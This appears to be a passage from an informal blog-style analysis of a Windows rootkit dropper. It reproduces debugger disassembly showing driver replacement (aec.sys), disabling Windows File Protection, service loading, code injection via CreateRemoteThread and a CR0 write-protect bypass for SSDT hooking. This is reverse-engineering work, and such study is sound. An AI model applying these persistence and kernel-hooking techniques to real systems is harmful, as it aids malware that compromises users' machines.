<br />0040416B . 50 PUSH EAX ; /pHandle<br />0040416C . 6A 08 PUSH 8 ; Access = KEY_ENUMERATE_SUB_KEYS<br />0040416E . 6A 00 PUSH 0 ; Reserved = 0<br />00404170 . 68 70444000 PUSH 404470 ; Subkey = "SYSTEM\CurrentControlSet\Services"<br />00404175 . 68 02000080 PUSH 80000002 ; hKey = HKEY_LOCAL_MACHINE<br />0040417A . FF15 6A4C4000 CALL NEAR DWORD PTR DS:[404C6A] ; \RegOpenKeyExA<br /><br />Now it will search for each driver in "SYSTEM\CurrentControlSet\Services", to find one with Start as 0x03 and has a valid ImagePath.<br /><br />In my case "aec.sys" was the first match. (Microsoft Kernel Acoustic Echo Canceller)<br /><br />Now it will copy the original aec.sys to temp folder.<br />00404231 . 6A 00 PUSH 0 ; /FailIfExists = FALSE<br />00404233 . 50 PUSH EAX ; NewFileName<br />00404234 . 57 PUSH EDI ; ExistingFileName = "C:\WINDOWS\system32\drivers\aec.sys"<br />00404235 . FF15 B44A4000 CALL NEAR DWORD PTR DS:[404AB4] ; \CopyFileA<br /><br />Now it will disable Windows File Protection (WFP). The API which the malware previously loadlibbed from sfc_os.dll is used :)<br /><br />Then it will copy the malware device driver to system32/drivers.<br /><br />0040424F . 6A 00 PUSH 0 ; /FailIfExists = FALSE<br />00404251 . 57 PUSH EDI ; NewFileName<br />00404252 . FF75 08 PUSH [ARG.1] ; ExistingFileName = "C:\DOCUME~1\Username\LOCALS~1\Temp\rdl5.tmp"<br />00404255 . FF15 B44A4000 CALL NEAR DWORD PTR DS:[404AB4] ; \CopyFileA<br />

Existing file aec.sys is replaced with malwares device driver.
But it doesnt seems to be worked in my system :P donno why :P

ANy way it moves onto loading the device driver using SCManager APIS.
<br />004042BF /$ 55 PUSH EBP<br />004042C0 . 89E5 MOV EBP, ESP<br />004042C2 . 83EC 0C SUB ESP, 0C<br />004042C5 . 31C0 XOR EAX, EAX<br />004042C7 . 8945 FC MOV [LOCAL.1], EAX<br />004042CA . 6A 10 PUSH 10<br />004042CC . 50 PUSH EAX<br />004042CD . 50 PUSH EAX<br />004042CE . FF15 5E4C4000 CALL NEAR DWORD PTR DS:[404C5E] ; ADVAPI32.OpenSCManagerA<br />004042D4 . 85C0 TEST EAX, EAX<br />004042D6 . 74 4A JE SHORT 00404322 ; finder.00404322<br />004042D8 . 8945 F4 MOV [LOCAL.3], EAX<br />004042DB . 6A 10 PUSH 10<br />004042DD . FF75 08 PUSH [ARG.1]<br />004042E0 . FF75 F4 PUSH [LOCAL.3]<br />004042E3 . FF15 724C4000 CALL NEAR DWORD PTR DS:[404C72] ; ADVAPI32.OpenServiceA<br />004042E9 . 85C0 TEST EAX, EAX<br />004042EB . 74 2C JE SHORT 00404319 ; finder.00404319<br />004042ED . 8945 F8 MOV [LOCAL.2], EAX<br />004042F0 . 6A 00 PUSH 0<br />004042F2 . 6A 00 PUSH 0<br />004042F4 . 50 PUSH EAX<br />004042F5 . FF15 664C4000 CALL NEAR DWORD PTR DS:[404C66] ; ADVAPI32.StartServiceA<br />004042FB . 85C0 TEST EAX, EAX<br />004042FD . 75 0B JNZ SHORT 0040430A ; finder.0040430A<br />004042FF . FF15 A44A4000 CALL NEAR DWORD PTR DS:[404AA4] ; ntdll.RtlGetLastWin32Error<br />00404305 . 83F8 57 CMP EAX, 57<br />00404308 . 75 06 JNZ SHORT 00404310 ; finder.00404310<br />0040430A > 31C0 XOR EAX, EAX<br />0040430C . 40 INC EAX<br />0040430D . 8945 FC MOV [LOCAL.1], EAX<br />00404310 > FF75 F8 PUSH [LOCAL.2]<br />00404313 . FF15 624C4000 CALL NEAR DWORD PTR DS:[404C62] ; ADVAPI32.CloseServiceHandle<br />00404319 > FF75 F4 PUSH [LOCAL.3]<br />0040431C . FF15 624C4000 CALL NEAR DWORD PTR DS:[404C62] ; ADVAPI32.CloseServiceHandle<br />00404322 > 8B45 FC MOV EAX, [LOCAL.1]<br />00404325 . C9 LEAVE<br />00404326 \. C2 0400 RETN 4<br />
The above code will start a service.

After the service is started, they will replace the original file, which was stored in "temp" folder.
I think, this happens only when they are failed to copy the malware to a sys file.
In my machine, it successfully copied into "asyncmac.sys".
Any way, i just copied the original .sys to drivers to avoid infection.

I will try to disasm the malware device driver after i have dealt with this :)

Seems like, it will just go on continue this, so i just broke from the loop.

After this, it will continue its infection, by making the svchost.exe(the malware) as default debugger.
Then it opens svchost.exe process and injects code using CreateRemoteThread().

Injected code starts from here:
00406A3A /$ 5D POP EBP
00406A3B . 83ED 0F SUB EBP, 0F

After that it ends execution by calling ExitProcess()

Analysis of malware device driver
---------------------------------

It surely tries to hook SSDT. I havnt analysed much, it is almost 1.30AM, and i have to go to office tomorrow(today?).
between, i can see this:

<br />cli<br />mov eax, cr0<br />mov eax, eax<br />mov [ebp+var_1C], eax<br />mov ebx, ebx<br />and eax, 0FFFEFFFFh<br />mov cr0, eax<br />mov eax, [ebp+var_30]<br />mov edx, [ebp+var_2C]<br />mov ebx, ebx<br />lock xchg edx, [eax]<br />mov ecx, ecx<br />mov eax, [ebp+var_1C]<br />mov cr0, eax<br />sti<br />


This surely looks like it disables the WriteProtect bit of cr0 (Control Register 0) to write entries to protected memory locations like SSDT. Any ways, i will try to figure it out eventually, till then, see you guys!